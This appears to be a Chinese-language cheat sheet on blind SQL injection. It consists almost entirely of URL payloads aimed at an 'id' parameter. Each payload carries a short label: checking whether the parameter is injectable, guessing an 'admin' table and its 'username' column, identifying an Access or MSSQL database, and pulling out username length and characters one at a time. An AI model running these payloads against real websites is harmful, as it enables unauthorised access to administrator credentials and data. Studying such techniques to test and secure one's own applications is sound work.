快速学习，理解.SQL注入技术

核心提示：检测可否注入http://127.0.0.1/xx?id=11 and 1=1 (正常页面)http://127.0.0.1/xx?id=11 and 1=2 (出错页面)检测表段的http://127.0.0.1/xx?id=11 and exists (select * from admin)检测字段的http:/

检测可否注入

http://127.0.0.1/xx?id=11 and 1=1 (正常页面)

http://127.0.0.1/xx?id=11 and 1=2 (出错页面)

检测表段的

http://127.0.0.1/xx?id=11 and exists (select * from admin)

检测字段的

http://127.0.0.1/xx?id=11 and exists (select username from admin)

检测ID

http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测长度的

http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)

检测是否为MSSQL数据库

http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)

检测是否为英文

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)

(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)

检测英文的范围

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)

(MSSQL数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)

检测那个字符

(ACCESS数据库)

http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)